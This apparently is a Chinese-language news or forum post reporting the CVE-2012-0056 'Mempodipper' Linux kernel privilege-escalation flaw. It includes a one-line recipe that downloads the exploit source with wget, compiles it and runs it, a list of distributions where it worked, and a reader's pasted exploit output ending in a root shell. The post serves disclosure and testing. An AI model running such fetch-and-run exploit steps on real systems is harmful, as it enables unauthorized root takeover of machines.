Linux 2.6.39 到 3.2.0 爆提权漏洞,重现方法:wget
Linux 2.6.39 到 3.2.0 爆提权漏洞,重现方法:wget
Linux 2.6.39 到 3.2.0 内核爆提权漏洞,普通用户可以通过运行特定代码获得 root 权限。
重现方法:
wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c cc mempodipper.c ./a.out
在执行完毕后运行 whoami 来看是否执行成功。
已知发行版情况:
Debian Wheezy Testing: 成功。内核 3.1.0-1-amd64。Debian Security Tracker ReportFedora 16: 失败。内核 3.2.1-3.fc16.x86_64Arch Linux: 失败。内核 3.2.2-1-arch如果你测试了,请将测试结果告诉我们!注意告诉我们发行版和 uname -a 的结果。
我机子上测试成功了
=============================== = Mempodipper = = by zx2c4 = = Jan 21, 2012 = =============================== [+] Ptracing su to find next instruction without reading binary. [+] Creating ptrace pipe. [+] Forking ptrace child. [+] Waiting for ptraced child to give output on syscalls. [+] Ptrace_traceme'ing process. [+] Error message written. Single stepping to find address. [+] Resolved call address to 0x401ce8. [+] Opening socketpair. [+] Waiting for transferred fd in parent. [+] Executing child from child fork. [+] Opening parent mem /proc/20553/mem in child. [+] Sending fd 6 to parent. [+] Received fd at 6. [+] Assigning fd 6 to stderr. [+] Calculating su padding. [+] Seeking to offset 0x401cdc. [+] Executing su with shellcode. # whoami root Ubuntu11.10 Linux desktop 3.0.0-14-generic #23-Ubuntu SMP Mon Nov 21 20:28:43 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
评论暂时关闭